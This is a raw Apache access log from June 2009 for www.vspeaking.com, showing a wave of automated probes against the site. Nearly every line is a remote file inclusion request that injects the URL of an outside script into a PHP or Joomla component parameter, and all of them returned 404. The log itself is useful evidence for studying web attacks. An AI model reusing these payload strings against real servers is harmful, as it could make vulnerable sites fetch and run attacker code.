194.63.248.44 - - [28/Jun/2009:17:00:18 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:00:22 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:00:22 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:00:40 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:00:40 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:00:40 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
208.80.195.27 - - [28/Jun/2009:17:01:34 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; FDM; Comcast; Comcast)" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:02:10 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:02:10 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:02:10 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:03:31 -0700] "GET /logs/access_090413.log//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:03:31 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:03:31 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
131.203.76.246 - - [28/Jun/2009:17:04:43 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
131.203.76.246 - - [28/Jun/2009:17:04:43 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
131.203.76.246 - - [28/Jun/2009:17:04:43 -0700] "GET /logs/access_090413.log//faqsupport/samplefaqsupport.php?path[docroot]=http://67.222.48.109/images/.ray/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.55.106.136 - - [28/Jun/2009:17:05:32 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
80.247.76.181 - - [28/Jun/2009:17:07:31 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.247.76.181 - - [28/Jun/2009:17:07:31 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.247.76.181 - - [28/Jun/2009:17:09:27 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.247.76.181 - - [28/Jun/2009:17:09:27 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
85.214.67.63 - - [28/Jun/2009:17:10:00 -0700] "GET /oneadmin/common/include.php?path[docroot]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.214.67.63 - - [28/Jun/2009:17:10:00 -0700] "GET /logs/oneadmin/common/include.php?path[docroot]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.214.67.63 - - [28/Jun/2009:17:10:00 -0700] "GET /logs/access.log%20%20/oneadmin/common/include.php?path[docroot]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [28/Jun/2009:17:10:08 -0700] "GET /logs/access_090413.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [28/Jun/2009:17:10:08 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [28/Jun/2009:17:10:08 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.109.22.117 - - [28/Jun/2009:17:11:22 -0700] "GET /logs/access.log//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
194.109.22.117 - - [28/Jun/2009:17:11:23 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
194.109.22.117 - - [28/Jun/2009:17:11:24 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
194.109.22.117 - - [28/Jun/2009:17:11:46 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
194.109.22.117 - - [28/Jun/2009:17:11:46 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:12:05 -0700] "GET /logs/access_090413.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:12:05 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:12:05 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:12:07 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:12:08 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:12:08 -0700] "GET /logs/access_090413.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:12:08 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:12:09 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:12:09 -0700] "GET /logs/access_090413.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [28/Jun/2009:17:12:38 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:13:18 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:13:18 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:13:18 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.109.22.117 - - [28/Jun/2009:17:14:05 -0700] "GET /error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
194.109.22.117 - - [28/Jun/2009:17:14:06 -0700] "GET /logs//error.php?dir=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.vspeaking.com"
89.253.238.151 - - [28/Jun/2009:17:14:32 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.253.238.151 - - [28/Jun/2009:17:14:32 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.253.238.151 - - [28/Jun/2009:17:14:32 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.253.238.151 - - [28/Jun/2009:17:14:33 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.253.238.151 - - [28/Jun/2009:17:14:33 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.253.238.151 - - [28/Jun/2009:17:14:33 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:15:06 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:15:06 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:15:06 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:15:06 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:15:06 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:15:07 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:15:23 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:15:23 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:15:23 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:16:01 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:16:01 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.63.248.44 - - [28/Jun/2009:17:16:01 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [28/Jun/2009:17:16:17 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.30.168.194 - - [28/Jun/2009:17:19:05 -0700] "GET /logs/oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.x-pronet.com/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
194.30.168.194 - - [28/Jun/2009:17:19:06 -0700] "GET /oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.x-pronet.com/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
89.253.238.151 - - [28/Jun/2009:17:19:34 -0700] "GET /logs/access_090413.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.253.238.151 - - [28/Jun/2009:17:19:39 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.253.238.151 - - [28/Jun/2009:17:20:19 -0700] "GET /logs/access_090413.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.253.238.151 - - [28/Jun/2009:17:20:34 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.214.67.63 - - [28/Jun/2009:17:23:35 -0700] "GET /logs/access.log/oneadmin/common/include.php?path[docroot]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:24:29 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:25:55 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:25:55 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:25:55 -0700] "GET /logs/access_090413.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
195.34.78.110 - - [28/Jun/2009:17:26:03 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:28:13 -0700] "GET /logs/access_090413.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:28:13 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
194.165.34.49 - - [28/Jun/2009:17:28:13 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:29:49 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:29:51 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:29:51 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:29:56 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:29:57 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:29:57 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:30:04 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:30:05 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:30:05 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:30:47 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:31:52 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:32:25 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:32:48 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:32:58 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:32:58 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:34:54 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:34:54 -0700] "GET /logs/access_090413.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:34:54 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:35:48 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:35:56 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:35:57 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:35:57 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:36:02 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.251.168.157 - - [28/Jun/2009:17:36:04 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.11.230.251 - - [28/Jun/2009:17:36:12 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:37:18 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
150.214.108.8 - - [28/Jun/2009:17:37:31 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:38:30 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:38:30 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.122.6.62 - - [28/Jun/2009:17:38:30 -0700] "GET /logs/access_090413.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:41:33 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:41:33 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:41:39 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:41:39 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:41:59 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:41:59 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:42:08 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:42:09 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.67.196.130 - - [28/Jun/2009:17:45:00 -0700] "GET /logs/access.log//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.45.56.47 - - [28/Jun/2009:17:46:02 -0700] "GET /logs/access_090413.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
